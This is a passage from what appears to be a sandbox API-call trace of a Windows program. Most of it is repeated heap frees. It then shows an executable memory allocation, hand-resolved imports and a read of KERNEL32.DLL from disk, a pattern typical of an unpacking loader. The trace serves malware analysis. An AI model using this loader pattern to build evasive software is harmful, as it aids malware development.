[0078.859] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x22fe410 | out: hHeap=0x440000) returned 1 [0078.859] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2311620 | out: hHeap=0x440000) returned 1 [0078.859] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2324830 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2337a40 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x234ac50 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x235de60 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2371070 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2384280 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2397490 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x23aa6a0 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x23bd8b0 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x23d0ac0 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x23e3cd0 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x23f6ee0 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x240a0f0 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x241d300 | out: hHeap=0x440000) returned 1 [0078.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2430510 | out: hHeap=0x440000) returned 1 [0078.910] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2443720 | out: hHeap=0x440000) returned 1 [0078.910] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2456930 | out: hHeap=0x440000) returned 1 [0078.911] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2469b40 | out: hHeap=0x440000) returned 1 [0078.911] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x247cd50 | out: hHeap=0x440000) returned 1 [0078.911] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x248ff60 | out: hHeap=0x440000) returned 1 [0078.911] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x24a3170 | out: hHeap=0x440000) returned 1 [0078.911] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x24b6380 | out: hHeap=0x440000) returned 1 [0078.911] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x24c9590 | out: hHeap=0x440000) returned 1 [0078.911] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x24dc7a0 | out: hHeap=0x440000) returned 1 [0078.911] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x24ef9b0 | out: hHeap=0x440000) returned 1 [0078.911] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2502bc0 | out: hHeap=0x440000) returned 1 [0078.911] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2520080 | out: hHeap=0x440000) returned 1 [0078.912] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2533290 | out: hHeap=0x440000) returned 1 [0078.912] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x25464a0 | out: hHeap=0x440000) returned 1 [0078.912] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x25596b0 | out: hHeap=0x440000) returned 1 [0078.912] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x256c8c0 | out: hHeap=0x440000) returned 1 [0078.912] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x257fad0 | out: hHeap=0x440000) returned 1 [0078.912] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2592ce0 | out: hHeap=0x440000) returned 1 [0078.912] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x25a5ef0 | out: hHeap=0x440000) returned 1 [0078.912] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x25b9100 | out: hHeap=0x440000) returned 1 [0078.912] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x25cc310 | out: hHeap=0x440000) returned 1 [0078.920] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x25df520 | out: hHeap=0x440000) returned 1 [0078.921] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x25f2730 | out: hHeap=0x440000) returned 1 [0078.921] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2605940 | out: hHeap=0x440000) returned 1 [0078.921] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2618b50 | out: hHeap=0x440000) returned 1 [0078.924] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x262bd60 | out: hHeap=0x440000) returned 1 [0078.924] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x263ef70 | out: hHeap=0x440000) returned 1 [0078.924] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2652180 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2665390 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x26785a0 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x268b7b0 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x269e9c0 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x26b1bd0 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x26c4de0 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x26d7ff0 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x26eb200 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x26fe410 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2711620 | out: hHeap=0x440000) returned 1 [0078.925] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2724830 | out: hHeap=0x440000) returned 1 [0078.930] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2737a40 | out: hHeap=0x440000) returned 1 [0078.931] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x274ac50 | out: hHeap=0x440000) returned 1 [0078.931] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x275de60 | out: hHeap=0x440000) returned 1 [0078.931] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2771070 | out: hHeap=0x440000) returned 1 [0078.931] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2784280 | out: hHeap=0x440000) returned 1 [0078.931] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2797490 | out: hHeap=0x440000) returned 1 [0078.931] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x27aa6a0 | out: hHeap=0x440000) returned 1 [0078.932] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x27bd8b0 | out: hHeap=0x440000) returned 1 [0078.932] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x27d0ac0 | out: hHeap=0x440000) returned 1 [0078.932] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x27e3cd0 | out: hHeap=0x440000) returned 1 [0078.932] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x27f6ee0 | out: hHeap=0x440000) returned 1 [0078.932] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x280a0f0 | out: hHeap=0x440000) returned 1 [0078.932] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x281d300 | out: hHeap=0x440000) returned 1 [0078.932] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2830510 | out: hHeap=0x440000) returned 1 [0078.938] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2843720 | out: hHeap=0x440000) returned 1 [0078.938] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2856930 | out: hHeap=0x440000) returned 1 [0078.938] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2869b40 | out: hHeap=0x440000) returned 1 [0078.938] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x287cd50 | out: hHeap=0x440000) returned 1 [0078.940] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x288ff60 | out: hHeap=0x440000) returned 1 [0078.940] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x28a3170 | out: hHeap=0x440000) returned 1 [0078.940] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x28b6380 | out: hHeap=0x440000) returned 1 [0078.941] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x28c9590 | out: hHeap=0x440000) returned 1 [0078.941] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x28dc7a0 | out: hHeap=0x440000) returned 1 [0078.941] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x28ef9b0 | out: hHeap=0x440000) returned 1 [0078.941] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2902bc0 | out: hHeap=0x440000) returned 1 [0078.941] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2915dd0 | out: hHeap=0x440000) returned 1 [0078.941] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2928fe0 | out: hHeap=0x440000) returned 1 [0078.941] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x293c1f0 | out: hHeap=0x440000) returned 1 [0078.989] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x294f400 | out: hHeap=0x440000) returned 1 [0078.989] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2962610 | out: hHeap=0x440000) returned 1 [0078.989] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2975820 | out: hHeap=0x440000) returned 1 [0078.989] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2988a30 | out: hHeap=0x440000) returned 1 [0078.990] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x299bc40 | out: hHeap=0x440000) returned 1 [0078.992] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x29aee50 | out: hHeap=0x440000) returned 1 [0078.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x29c2060 | out: hHeap=0x440000) returned 1 [0078.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x29d5270 | out: hHeap=0x440000) returned 1 [0078.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x29e8480 | out: hHeap=0x440000) returned 1 [0078.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x29fb690 | out: hHeap=0x440000) returned 1 [0078.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2a0e8a0 | out: hHeap=0x440000) returned 1 [0078.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2a21ab0 | out: hHeap=0x440000) returned 1 [0078.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2a34cc0 | out: hHeap=0x440000) returned 1 [0078.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2a47ed0 | out: hHeap=0x440000) returned 1 [0078.998] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2a5b0e0 | out: hHeap=0x440000) returned 1 [0078.998] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2a6e2f0 | out: hHeap=0x440000) returned 1 [0078.998] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2a81500 | out: hHeap=0x440000) returned 1 [0078.998] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2a94710 | out: hHeap=0x440000) returned 1 [0078.998] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2aa7920 | out: hHeap=0x440000) returned 1 [0078.998] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2abab30 | out: hHeap=0x440000) returned 1 [0079.000] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2acdd40 | out: hHeap=0x440000) returned 1 [0079.002] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ae0f50 | out: hHeap=0x440000) returned 1 [0079.002] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2af4160 | out: hHeap=0x440000) returned 1 [0079.002] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2b07370 | out: hHeap=0x440000) returned 1 [0079.002] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2b1a580 | out: hHeap=0x440000) returned 1 [0079.002] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2b2d790 | out: hHeap=0x440000) returned 1 [0079.002] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2b409a0 | out: hHeap=0x440000) returned 1 [0079.002] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2b53bb0 | out: hHeap=0x440000) returned 1 [0079.007] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2b66dc0 | out: hHeap=0x440000) returned 1 [0079.007] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2b79fd0 | out: hHeap=0x440000) returned 1 [0079.007] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2b8d1e0 | out: hHeap=0x440000) returned 1 [0079.007] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ba03f0 | out: hHeap=0x440000) returned 1 [0079.007] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2bb3600 | out: hHeap=0x440000) returned 1 [0079.007] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2bc6810 | out: hHeap=0x440000) returned 1 [0079.009] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2bd9a20 | out: hHeap=0x440000) returned 1 [0079.011] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2becc30 | out: hHeap=0x440000) returned 1 [0079.011] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2bffe40 | out: hHeap=0x440000) returned 1 [0079.011] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c13050 | out: hHeap=0x440000) returned 1 [0079.011] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c26260 | out: hHeap=0x440000) returned 1 [0079.011] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c39470 | out: hHeap=0x440000) returned 1 [0079.011] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c4c680 | out: hHeap=0x440000) returned 1 [0079.011] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c5f890 | out: hHeap=0x440000) returned 1 [0079.016] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c72aa0 | out: hHeap=0x440000) returned 1 [0079.016] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c85cb0 | out: hHeap=0x440000) returned 1 [0079.016] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c98ec0 | out: hHeap=0x440000) returned 1 [0079.016] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cac0d0 | out: hHeap=0x440000) returned 1 [0079.016] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cbf2e0 | out: hHeap=0x440000) returned 1 [0079.018] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cd24f0 | out: hHeap=0x440000) returned 1 [0079.019] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ce5700 | out: hHeap=0x440000) returned 1 [0079.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cf8910 | out: hHeap=0x440000) returned 1 [0079.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2d20080 | out: hHeap=0x440000) returned 1 [0079.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2d33290 | out: hHeap=0x440000) returned 1 [0079.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2d464a0 | out: hHeap=0x440000) returned 1 [0079.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2d596b0 | out: hHeap=0x440000) returned 1 [0079.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2d6c8c0 | out: hHeap=0x440000) returned 1 [0079.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2d7fad0 | out: hHeap=0x440000) returned 1 [0079.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2d92ce0 | out: hHeap=0x440000) returned 1 [0079.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2da5ef0 | out: hHeap=0x440000) returned 1 [0079.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2db9100 | out: hHeap=0x440000) returned 1 [0079.066] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2dcc310 | out: hHeap=0x440000) returned 1 [0079.068] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ddf520 | out: hHeap=0x440000) returned 1 [0079.068] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2df2730 | out: hHeap=0x440000) returned 1 [0079.068] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2e05940 | out: hHeap=0x440000) returned 1 [0079.068] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2e18b50 | out: hHeap=0x440000) returned 1 [0079.072] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2e2bd60 | out: hHeap=0x440000) returned 1 [0079.072] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2e3ef70 | out: hHeap=0x440000) returned 1 [0079.072] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x440000) returned 1 [0079.072] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2e65390 | out: hHeap=0x440000) returned 1 [0079.072] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2e785a0 | out: hHeap=0x440000) returned 1 [0079.072] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2e8b7b0 | out: hHeap=0x440000) returned 1 [0079.075] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2e9e9c0 | out: hHeap=0x440000) returned 1 [0079.076] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2eb1bd0 | out: hHeap=0x440000) returned 1 [0079.076] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ec4de0 | out: hHeap=0x440000) returned 1 [0079.076] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ed7ff0 | out: hHeap=0x440000) returned 1 [0079.217] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2eeb200 | out: hHeap=0x440000) returned 1 [0079.217] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2efe410 | out: hHeap=0x440000) returned 1 [0079.217] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2f11620 | out: hHeap=0x440000) returned 1 [0079.217] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2f24830 | out: hHeap=0x440000) returned 1 [0079.221] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2f37a40 | out: hHeap=0x440000) returned 1 [0079.221] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2f4ac50 | out: hHeap=0x440000) returned 1 [0079.221] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2f5de60 | out: hHeap=0x440000) returned 1 [0079.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2f71070 | out: hHeap=0x440000) returned 1 [0079.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2f84280 | out: hHeap=0x440000) returned 1 [0079.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2f97490 | out: hHeap=0x440000) returned 1 [0079.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2faa6a0 | out: hHeap=0x440000) returned 1 [0079.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2fbd8b0 | out: hHeap=0x440000) returned 1 [0079.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2fd0ac0 | out: hHeap=0x440000) returned 1 [0079.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2fe3cd0 | out: hHeap=0x440000) returned 1 [0079.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ff6ee0 | out: hHeap=0x440000) returned 1 [0079.222] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x300a0f0 | out: hHeap=0x440000) returned 1 [0079.225] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x301d300 | out: hHeap=0x440000) returned 1 [0079.236] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3030510 | out: hHeap=0x440000) returned 1 [0079.238] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3043720 | out: hHeap=0x440000) returned 1 [0079.589] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0079.593] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0079.594] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0079.594] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0079.594] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0079.594] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0079.594] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0079.595] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0079.595] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0079.595] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0079.595] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0079.595] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0079.595] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0079.595] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0079.595] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0079.596] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0079.596] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0079.596] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0079.596] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0079.596] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0079.596] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0079.596] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0079.596] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0079.596] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0079.597] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0079.597] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0079.597] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0079.597] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x46db40 | out: hHeap=0x440000) returned 1 [0079.597] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0079.602] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4508b0 | out: hHeap=0x440000) returned 1 [0079.605] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0079.606] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0079.606] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0079.606] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0079.606] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0079.606] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0079.609] GetProcessHeap () returned 0x440000 [0079.609] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x68) returned 0x448d40 [0079.689] GetProcessHeap () returned 0x440000 [0079.689] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x459280 [0079.690] GetProcessHeap () returned 0x440000 [0079.690] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x48) returned 0x450180 [0079.691] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0079.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0079.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0079.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0079.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0079.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0079.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0079.691] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0079.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0079.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0079.691] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0079.692] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0079.692] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0079.692] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0079.692] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0079.693] GetProcessHeap () returned 0x440000 [0079.693] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xac430) returned 